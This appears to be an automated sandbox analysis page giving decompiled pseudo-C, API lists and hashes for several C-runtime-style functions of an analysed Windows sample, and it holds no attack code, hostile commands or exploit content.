                                                                                                                                                                                                                              Function 00007FF735C53EA8 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                                                                                              			E00007FF77FF735C53EA8(intOrPtr __edx, long long __rbx, void* __rcx, void* __r8, intOrPtr* __r9, long long _a16) {
				signed int _v56;
				intOrPtr _v64;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v120;
				signed long long _v128;
				long long _v136;
				void* __rsi;
				void* __rbp;
				long _t37;
				intOrPtr _t40;
				int _t42;
				signed int _t47;
				intOrPtr _t60;
				long _t61;
				signed long long _t78;
				signed long long _t79;
				intOrPtr _t89;
				void* _t102;

				_a16 = __rbx;
				_t78 =  *0x35c7b008; // 0x861d85c91f07
				_t79 = _t78 ^ _t102 - 0x00000080;
				_v56 = _t79;
				r14d = __edx; // executed
				_t37 = GetFileType(??); // executed
				r15d = 1;
				asm("btr ecx, 0xf");
				if (_t37 != r15d) goto 0x35c53fb3;
				 *((intOrPtr*)(__r9 + 8)) = r15w;
				if (__rcx == 0) goto 0x35c53f22;
				_v120 = _v120 & 0x00000000;
				if (E00007FF77FF735C542C8(__rcx,  &_v120, __r8) == 0) goto 0x35c53fca;
				_t40 = _v120 - 1;
				 *((intOrPtr*)(__r9 + 0x10)) = _t40;
				 *__r9 = _t40;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x48], xmm0");
				_v64 = 0;
				asm("movups [ebp-0x38], xmm0");
				asm("movups [ebp-0x28], xmm0"); // executed
				_t42 = GetFileInformationByHandle(??, ??); // executed
				if (_t42 == 0) goto 0x35c53fce;
				_t60 = _v112;
				_t96 = __rcx;
				 *((short*)(__r9 + 6)) = E00007FF77FF735C5418C(_t60, __r9, __rcx, __r8, _t102);
				E00007FF77FF735C54050(_t60, _v92, _t96); // executed
				 *(__r9 + 0x20) = _t79;
				E00007FF77FF735C54050(_t60, _v100, _t79); // executed
				_t89 = _v108;
				 *(__r9 + 0x18) = _t79;
				E00007FF77FF735C54050(_t60, _t89,  *(__r9 + 0x20)); // executed
				 *(__r9 + 0x28) = _t79;
				 *(__r9 + 0x14) =  *(__r9 + 0x14) & 0x00000000;
				if (_v80 != 0) goto 0x35c53fa6;
				_t47 = _v76;
				if (_t47 - 0x7fffffff > 0) goto 0x35c53fa6;
				 *(__r9 + 0x14) = _t47;
				goto 0x35c5402a;
				E00007FF77FF735C53B18(_t79);
				 *_t79 = 0x84;
				goto 0x35c53fca;
				_t25 = _t89 - 2; // -2
				if (_t25 - r15d <= 0) goto 0x35c53fdd;
				if (_t60 != 0) goto 0x35c53fce;
				E00007FF77FF735C53B18(_t79);
				 *_t79 = 9;
				goto 0x35c5402d;
				_t61 = GetLastError();
				E00007FF77FF735C53A8C(_t61, _t79, _t89);
				goto 0x35c53fca;
				 *((intOrPtr*)(__r9 + 8)) = r15w;
				 *((intOrPtr*)(__r9 + 0x10)) = r14d;
				 *__r9 = r14d;
				_t55 =  ==  ? 0x2000 : 0x1000;
				 *((short*)(__r9 + 6)) =  ==  ? 0x2000 : 0x1000;
				if (_t61 == 2) goto 0x35c5402a;
				_v128 = _v128 & 0x00000000;
				_v136 =  &_v120;
				r9d = 0;
				r8d = 0;
				if (PeekNamedPipe(??, ??, ??, ??, ??, ??) == 0) goto 0x35c5402a;
				 *(__r9 + 0x14) = _v120;
				return E00007FF77FF735C4A410(r15b, _v120, _v56 ^ _t102 - 0x00000080);
			}


























                                                                                                                                                                                                                              0x7ff735c53ea8
                                                                                                                                                                                                                              0x7ff735c53ebe
                                                                                                                                                                                                                              0x7ff735c53ec5
                                                                                                                                                                                                                              0x7ff735c53ec8
                                                                                                                                                                                                                              0x7ff735c53ed8
                                                                                                                                                                                                                              0x7ff735c53edb
                                                                                                                                                                                                                              0x7ff735c53ee3
                                                                                                                                                                                                                              0x7ff735c53ee9
                                                                                                                                                                                                                              0x7ff735c53ef0
                                                                                                                                                                                                                              0x7ff735c53ef6
                                                                                                                                                                                                                              0x7ff735c53efe
                                                                                                                                                                                                                              0x7ff735c53f00
                                                                                                                                                                                                                              0x7ff735c53f12
                                                                                                                                                                                                                              0x7ff735c53f1b
                                                                                                                                                                                                                              0x7ff735c53f1d
                                                                                                                                                                                                                              0x7ff735c53f20
                                                                                                                                                                                                                              0x7ff735c53f22
                                                                                                                                                                                                                              0x7ff735c53f2e
                                                                                                                                                                                                                              0x7ff735c53f32
                                                                                                                                                                                                                              0x7ff735c53f35
                                                                                                                                                                                                                              0x7ff735c53f39
                                                                                                                                                                                                                              0x7ff735c53f3d
                                                                                                                                                                                                                              0x7ff735c53f45
                                                                                                                                                                                                                              0x7ff735c53f4b
                                                                                                                                                                                                                              0x7ff735c53f4e
                                                                                                                                                                                                                              0x7ff735c53f5c
                                                                                                                                                                                                                              0x7ff735c53f60
                                                                                                                                                                                                                              0x7ff735c53f6c
                                                                                                                                                                                                                              0x7ff735c53f70
                                                                                                                                                                                                                              0x7ff735c53f79
                                                                                                                                                                                                                              0x7ff735c53f7d
                                                                                                                                                                                                                              0x7ff735c53f81
                                                                                                                                                                                                                              0x7ff735c53f86
                                                                                                                                                                                                                              0x7ff735c53f8a
                                                                                                                                                                                                                              0x7ff735c53f92
                                                                                                                                                                                                                              0x7ff735c53f94
                                                                                                                                                                                                                              0x7ff735c53f9c
                                                                                                                                                                                                                              0x7ff735c53f9e
                                                                                                                                                                                                                              0x7ff735c53fa1
                                                                                                                                                                                                                              0x7ff735c53fa6
                                                                                                                                                                                                                              0x7ff735c53fab
                                                                                                                                                                                                                              0x7ff735c53fb1
                                                                                                                                                                                                                              0x7ff735c53fb3
                                                                                                                                                                                                                              0x7ff735c53fb9
                                                                                                                                                                                                                              0x7ff735c53fbd
                                                                                                                                                                                                                              0x7ff735c53fbf
                                                                                                                                                                                                                              0x7ff735c53fc4
                                                                                                                                                                                                                              0x7ff735c53fcc
                                                                                                                                                                                                                              0x7ff735c53fd4
                                                                                                                                                                                                                              0x7ff735c53fd6
                                                                                                                                                                                                                              0x7ff735c53fdb
                                                                                                                                                                                                                              0x7ff735c53fe0
                                                                                                                                                                                                                              0x7ff735c53fea
                                                                                                                                                                                                                              0x7ff735c53ff3
                                                                                                                                                                                                                              0x7ff735c53ff6
                                                                                                                                                                                                                              0x7ff735c53ffa
                                                                                                                                                                                                                              0x7ff735c53ffe
                                                                                                                                                                                                                              0x7ff735c54000
                                                                                                                                                                                                                              0x7ff735c5400a
                                                                                                                                                                                                                              0x7ff735c5400f
                                                                                                                                                                                                                              0x7ff735c54015
                                                                                                                                                                                                                              0x7ff735c54022
                                                                                                                                                                                                                              0x7ff735c54027
                                                                                                                                                                                                                              0x7ff735c5404f

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 33cfecf2bf1929a6bdebc16e79a9a8bb0d86d1e36610a21678bc5292cc26cc2b
                                                                                                                                                                                                                              • Instruction ID: 9c1c84d79f8e0bd180df5fa32fbc2f814bfae06712460bb6763c88493ade98c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33cfecf2bf1929a6bdebc16e79a9a8bb0d86d1e36610a21678bc5292cc26cc2b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02515DA3A186039AE710EFA2D4503BDA3B1AB98F9CF548935EE0947689DF38D441D760
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C53D54 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                              • Opcode ID: 5976d74426c5bb6cce8dda3f3a6ecf4c8edf605f8af02e877db5483d22283717
                                                                                                                                                                                                                              • Instruction ID: 32d74603293632b4a623d69fb9282929fbf8fd84b0e0f9f95e8c5ce7a80f357e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5976d74426c5bb6cce8dda3f3a6ecf4c8edf605f8af02e877db5483d22283717
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C041A363D18783A3E350AFA295403B9E2A0FB95B68F509734E65C03AD1DF6CA5A0D720
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C57E88 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 28%
                                                                                                                                                                                                                              			E00007FF77FF735C57E88() {
				void* _t1;
				void* _t6;
				void* _t11;

				_t1 = E00007FF77FF735C57EBC(); // executed
				if (_t1 == 0) goto 0x35c57eaa;
				GetCurrentProcess();
				E00007FF77FF735C57EEC(TerminateProcess(??, ??), _t6, _t11);
				ExitProcess(??);
			}






                                                                                                                                                                                                                              0x7ff735c57e90
                                                                                                                                                                                                                              0x7ff735c57e97
                                                                                                                                                                                                                              0x7ff735c57e99
                                                                                                                                                                                                                              0x7ff735c57eac
                                                                                                                                                                                                                              0x7ff735c57eb3

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 40dcead9090a8954af95a001021de58c4c9c92b4b535758b67426d92d813f1cc
                                                                                                                                                                                                                              • Instruction ID: 11fce878c5b19f8416b487f50e9911110a3ce3dc208e4c2eae8ca8f533558200
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40dcead9090a8954af95a001021de58c4c9c92b4b535758b67426d92d813f1cc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCD05E52B0870367EB083BB15C49078D2A15F48F48F941838CC0F063A3CD7DAC8CA220
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4E658 Relevance: 3.2, APIs: 2, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E00007FF77FF735C4E658(intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, long long __r9, long long _a8, long long _a32) {

				_a8 = __rbx;
				_a32 = __r9;
				if (__r8 == 0) goto 0x35c4e699;
				if (__r9 == 0) goto 0x35c4e699;
				if (__rcx != 0) goto 0x35c4e6b0;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 0x16;
				E00007FF77FF735C59400();
				return 0;
			}



                                                                                                                                                                                                                              0x7ff735c4e658
                                                                                                                                                                                                                              0x7ff735c4e65d
                                                                                                                                                                                                                              0x7ff735c4e67d
                                                                                                                                                                                                                              0x7ff735c4e682
                                                                                                                                                                                                                              0x7ff735c4e687
                                                                                                                                                                                                                              0x7ff735c4e689
                                                                                                                                                                                                                              0x7ff735c4e68e
                                                                                                                                                                                                                              0x7ff735c4e694
                                                                                                                                                                                                                              0x7ff735c4e6af

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 7f3b625c0133e45beacbab82541ba2c2028931336163aa3abc97c793215ced7d
                                                                                                                                                                                                                              • Instruction ID: 4f4254dde8ddcc76dbe562a85833e78837c107aa7bafcada42786f215efb565d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f3b625c0133e45beacbab82541ba2c2028931336163aa3abc97c793215ced7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C510BA3B0926765FB66BE369400A7AE652BF40FBCF854630DD6C077C5CE3CD401A621
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5699C Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                                                                                              			E00007FF77FF735C5699C(void* __ecx, long long __rbx, signed int __rdx, long long __rdi, long long __r14, long long _a8, long long _a16, long long _a24) {
				signed long long _v24;
				int _t20;
				long _t21;
				void* _t29;
				void* _t43;
				void* _t45;
				void* _t53;
				void* _t64;
				signed int* _t66;
				signed long long _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				intOrPtr* _t71;
				signed long long _t74;
				void* _t77;
				intOrPtr _t78;
				void* _t80;
				signed long long* _t85;
				void* _t89;
				signed long long _t93;
				intOrPtr _t95;
				signed long long _t96;
				void* _t97;
				void* _t98;
				signed long long _t102;
				signed long long _t106;

				_a8 = __rbx;
				_a16 = __rdi;
				_a24 = __r14;
				_t43 = __ecx;
				_t66 = __rdx - 3;
				if (_t66 - 1 <= 0) goto 0x35c56b41;
				_t45 = __ecx - 0x16;
				if (_t45 > 0) goto 0x35c56a86;
				asm("bt eax, ecx");
				if (_t45 >= 0) goto 0x35c56a86;
				r15d = 0;
				E00007FF77FF735C5EDA0();
				if (__ecx == 2) goto 0x35c569f4;
				if (__ecx != 0x15) goto 0x35c56a2d;
				if ( *0x35c8a774 != 0) goto 0x35c56a2d;
				_t20 = SetConsoleCtrlHandler(??, ??); // executed
				if (_t20 == 0) goto 0x35c56a1c;
				 *0x35c8a774 = 1;
				goto 0x35c56a2d;
				_t21 = GetLastError();
				E00007FF77FF735C53AF8(_t66);
				 *_t66 = _t21;
				E00007FF77FF735C56690(__ecx, _t20);
				if (_t66 == 0) goto 0x35c56a6c;
				_t93 =  *0x35c7b008; // 0x861d85c91f07
				_t106 = _t93 ^  *_t66;
				asm("dec ecx");
				_v24 = _t106;
				if (__rdx == 2) goto 0x35c56a6c;
				asm("dec ecx");
				_t102 = __rdx ^ _t93;
				 *_t66 = _t102;
				E00007FF77FF735C5EDF4();
				if (1 != 0) goto 0x35c56b41;
				_t67 = _t106;
				goto 0x35c56b5f;
				_t53 = __ecx - 0xb;
				if (_t53 > 0) goto 0x35c56b41;
				asm("bt eax, edi");
				if (_t53 >= 0) goto 0x35c56b41;
				E00007FF77FF735C59DD8(_t67, __rbx, 0x7ff735c565f4, __rdx, _t89, _t97);
				_t74 = _t67;
				if (_t67 == 0) goto 0x35c56b41;
				_t77 =  *_t67;
				_t68 = _t77;
				if (_t77 != 0x35c6fd00) goto 0x35c56aec;
				_t78 =  *0x35c6fdc8; // 0xc0
				E00007FF77FF735C5C140(_t68, _t78);
				 *_t74 = _t68;
				if (_t68 == 0) goto 0x35c56b41;
				E00007FF77FF735C4B150();
				_t80 =  *_t74;
				_t69 = _t80;
				_t95 =  *0x35c6fdc0; // 0xc
				_t96 = _t95 + _t95;
				goto 0x35c56b05;
				if ( *((intOrPtr*)(_t69 + 4)) == _t43) goto 0x35c56b0c;
				_t70 = _t69 + 0x10;
				if (_t70 != _t69 + _t96 * 8) goto 0x35c56afc;
				if (_t70 == 0) goto 0x35c56b41;
				_t11 = _t70 + 8; // 0x8
				_t85 = _t11;
				if (_t102 == 2) goto 0x35c56b3c;
				_t98 = _t80 + _t96 * 8;
				if (_t70 == _t98) goto 0x35c56b3c;
				if ( *((intOrPtr*)(_t85 - 4)) != _t43) goto 0x35c56b3c;
				 *_t85 = _t102;
				_t15 =  &(_t85[2]) - 8; // -16
				if (_t15 != _t98) goto 0x35c56b27;
				_t71 =  *_t85;
				goto 0x35c56b5f;
				_t64 = _t43 - 0x11;
				if (_t64 > 0) goto 0x35c56b50;
				asm("bt eax, edi");
				if (_t64 < 0) goto 0x35c56b5b;
				_t29 = E00007FF77FF735C53B18(_t71);
				 *_t71 = 0x16;
				return _t29;
			}






























                                                                                                                                                                                                                              0x7ff735c5699c
                                                                                                                                                                                                                              0x7ff735c569a1
                                                                                                                                                                                                                              0x7ff735c569a6
                                                                                                                                                                                                                              0x7ff735c569b4
                                                                                                                                                                                                                              0x7ff735c569b6
                                                                                                                                                                                                                              0x7ff735c569be
                                                                                                                                                                                                                              0x7ff735c569c4
                                                                                                                                                                                                                              0x7ff735c569c7
                                                                                                                                                                                                                              0x7ff735c569d2
                                                                                                                                                                                                                              0x7ff735c569d5
                                                                                                                                                                                                                              0x7ff735c569dd
                                                                                                                                                                                                                              0x7ff735c569e4
                                                                                                                                                                                                                              0x7ff735c569ed
                                                                                                                                                                                                                              0x7ff735c569f2
                                                                                                                                                                                                                              0x7ff735c569fb
                                                                                                                                                                                                                              0x7ff735c56a09
                                                                                                                                                                                                                              0x7ff735c56a11
                                                                                                                                                                                                                              0x7ff735c56a13
                                                                                                                                                                                                                              0x7ff735c56a1a
                                                                                                                                                                                                                              0x7ff735c56a1c
                                                                                                                                                                                                                              0x7ff735c56a24
                                                                                                                                                                                                                              0x7ff735c56a29
                                                                                                                                                                                                                              0x7ff735c56a2f
                                                                                                                                                                                                                              0x7ff735c56a37
                                                                                                                                                                                                                              0x7ff735c56a39
                                                                                                                                                                                                                              0x7ff735c56a49
                                                                                                                                                                                                                              0x7ff735c56a4e
                                                                                                                                                                                                                              0x7ff735c56a51
                                                                                                                                                                                                                              0x7ff735c56a5a
                                                                                                                                                                                                                              0x7ff735c56a63
                                                                                                                                                                                                                              0x7ff735c56a66
                                                                                                                                                                                                                              0x7ff735c56a69
                                                                                                                                                                                                                              0x7ff735c56a71
                                                                                                                                                                                                                              0x7ff735c56a78
                                                                                                                                                                                                                              0x7ff735c56a7e
                                                                                                                                                                                                                              0x7ff735c56a81
                                                                                                                                                                                                                              0x7ff735c56a86
                                                                                                                                                                                                                              0x7ff735c56a89
                                                                                                                                                                                                                              0x7ff735c56a94
                                                                                                                                                                                                                              0x7ff735c56a97
                                                                                                                                                                                                                              0x7ff735c56a9d
                                                                                                                                                                                                                              0x7ff735c56aa2
                                                                                                                                                                                                                              0x7ff735c56aa8
                                                                                                                                                                                                                              0x7ff735c56aae
                                                                                                                                                                                                                              0x7ff735c56ab1
                                                                                                                                                                                                                              0x7ff735c56abe
                                                                                                                                                                                                                              0x7ff735c56ac0
                                                                                                                                                                                                                              0x7ff735c56ac7
                                                                                                                                                                                                                              0x7ff735c56acc
                                                                                                                                                                                                                              0x7ff735c56ad2
                                                                                                                                                                                                                              0x7ff735c56ae1
                                                                                                                                                                                                                              0x7ff735c56ae6
                                                                                                                                                                                                                              0x7ff735c56ae9
                                                                                                                                                                                                                              0x7ff735c56aec
                                                                                                                                                                                                                              0x7ff735c56af3
                                                                                                                                                                                                                              0x7ff735c56afa
                                                                                                                                                                                                                              0x7ff735c56aff
                                                                                                                                                                                                                              0x7ff735c56b01
                                                                                                                                                                                                                              0x7ff735c56b08
                                                                                                                                                                                                                              0x7ff735c56b0f
                                                                                                                                                                                                                              0x7ff735c56b11
                                                                                                                                                                                                                              0x7ff735c56b11
                                                                                                                                                                                                                              0x7ff735c56b1c
                                                                                                                                                                                                                              0x7ff735c56b1e
                                                                                                                                                                                                                              0x7ff735c56b25
                                                                                                                                                                                                                              0x7ff735c56b2a
                                                                                                                                                                                                                              0x7ff735c56b2c
                                                                                                                                                                                                                              0x7ff735c56b33
                                                                                                                                                                                                                              0x7ff735c56b3a
                                                                                                                                                                                                                              0x7ff735c56b3c
                                                                                                                                                                                                                              0x7ff735c56b3f
                                                                                                                                                                                                                              0x7ff735c56b41
                                                                                                                                                                                                                              0x7ff735c56b44
                                                                                                                                                                                                                              0x7ff735c56b4b
                                                                                                                                                                                                                              0x7ff735c56b4e
                                                                                                                                                                                                                              0x7ff735c56b50
                                                                                                                                                                                                                              0x7ff735c56b55
                                                                                                                                                                                                                              0x7ff735c56b74

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetConsoleCtrlHandler.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FF735C58884), ref: 00007FF735C56A09
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FF735C58884), ref: 00007FF735C56A1C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleCtrlErrorHandlerLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3113525192-0
                                                                                                                                                                                                                              • Opcode ID: 01942bba38147ea5e1fc2df37352682dc4c48f1c9c5664ddab616c3f34500436
                                                                                                                                                                                                                              • Instruction ID: 9e19de5865a631157823c8a382babbd6cd6d57f058f3f32d6b6f657d8a8bdc13
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01942bba38147ea5e1fc2df37352682dc4c48f1c9c5664ddab616c3f34500436
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60519DB3F08643A1FA11AB9694502B9E6A5AF90F48FD54931D90D073D2DF7DE484B3A0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C59678 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                              			E00007FF77FF735C59678(signed int __ecx, void* __edx, void* __edi, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				void* __rdi;
				int _t22;
				long _t29;
				intOrPtr _t51;
				void* _t65;

				_a8 = __rbx;
				_a16 = __rsi;
				_t65 = __rdx;
				E00007FF77FF735C56534(__edi, __rax);
				if (__rax != 0xffffffff) goto 0x35c5969e;
				goto 0x35c596f8;
				_t51 =  *0x35c8aa40; // 0x293619a5b10
				if (__edi != 1) goto 0x35c596b8;
				if (( *(_t51 + 0xc8) & dil) != 0) goto 0x35c596c5;
				if (__edi != 2) goto 0x35c596dc;
				if (( *(_t51 + 0x80) & 0x00000001) == 0) goto 0x35c596dc;
				E00007FF77FF735C56534(2, _t51);
				E00007FF77FF735C56534(1, _t51);
				if (_t51 == _t51) goto 0x35c5969a;
				E00007FF77FF735C56534(__edi, _t51);
				_t22 = FindCloseChangeNotification(??); // executed
				if (_t22 != 0) goto 0x35c5969a;
				_t29 = GetLastError();
				E00007FF77FF735C56478(_t23, _t29, __edi, _t51, __ecx, _t65);
				 *((char*)( *((intOrPtr*)(0x35c8aa40 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8)) = 0;
				if (_t29 == 0) goto 0x35c59733;
				E00007FF77FF735C53AD4(_t29, _t65);
				goto 0x35c59735;
				return 0;
			}








                                                                                                                                                                                                                              0x7ff735c59678
                                                                                                                                                                                                                              0x7ff735c5967d
                                                                                                                                                                                                                              0x7ff735c5968a
                                                                                                                                                                                                                              0x7ff735c5968f
                                                                                                                                                                                                                              0x7ff735c59698
                                                                                                                                                                                                                              0x7ff735c5969c
                                                                                                                                                                                                                              0x7ff735c5969e
                                                                                                                                                                                                                              0x7ff735c596ad
                                                                                                                                                                                                                              0x7ff735c596b6
                                                                                                                                                                                                                              0x7ff735c596ba
                                                                                                                                                                                                                              0x7ff735c596c3
                                                                                                                                                                                                                              0x7ff735c596c5
